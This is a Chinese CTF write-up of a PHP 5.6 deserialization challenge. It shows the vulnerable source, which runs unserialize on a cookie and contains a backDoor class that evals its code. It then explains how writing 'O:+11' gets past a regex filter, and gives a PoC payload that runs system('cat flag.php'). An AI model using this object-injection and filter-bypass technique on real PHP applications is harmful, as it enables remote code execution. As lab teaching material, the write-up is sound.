PHP/5.6.40正则绕过

    1. <?php
    3. /*
    4. # -*- coding: utf-8 -*-
    5. # @Author: h1xa
    6. # @Date:   2020-12-02 17:44:47
    7. # @Last Modified by:   h1xa
    8. # @Last Modified time: 2020-12-02 21:38:56
    9. # @email: h1xa@ctfer.com
    10. # @link: https://ctfer.com
    12. */
    14. error_reporting(0);
    15. highlight_file(__FILE__);
    17. class ctfShowUser{
    18.     public $username='xxxxxx';
    19.     public $password='xxxxxx';
    20.     public $isVip=false;
    21.     public $class = 'info';
    23.     public function __construct(){
    24.         $this->class=new info();
    25.     }
    26.     public function login($u,$p){
    27.         return $this->username===$u&&$this->password===$p;
    28.     }
    29.     public function __destruct(){
    30.         $this->class->getInfo();
    31.     }
    33. }
    35. class info{
    36.     public $user='xxxxxx';
    37.     public function getInfo(){
    38.         return $this->user;
    39.     }
    40. }
    42. class backDoor{
    43.     public $code;
    44.     public function getInfo(){
    45.         eval($this->code);
    46.     }
    47. }
    49. $username=$_GET['username'];
    50. $password=$_GET['password'];
    52. if(isset($username) && isset($password)){
    53.     if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
    54.         $user = unserialize($_COOKIE['user']);
    55.     }
    56.     $user->login($username,$password);
    57. }

    分析:
    绕过正则 /[oc]:\d+:/i , 其实就是 C:数字 或 O:数字 不连续,这里只需让 O:11 不连续即可,比如 O:+11

    poc

    1. <?php
    2. class ctfShowUser{
    3.     public function __construct(){
    4.         $this->class=new backDoor();
    5.     }
    6. }
    8. class backDoor{
    9.     public $code = 'system("cat flag.php");';
    10. }
    12. $user = new ctfShowUser();
    13. $user_replace = preg_replace('/([oc]\:)(\d+)/i', '$1+$2', serialize($user));
    14. echo urlencode($user_replace);
    15. ?>

    image.png
    图中 %2b+ 的 url编码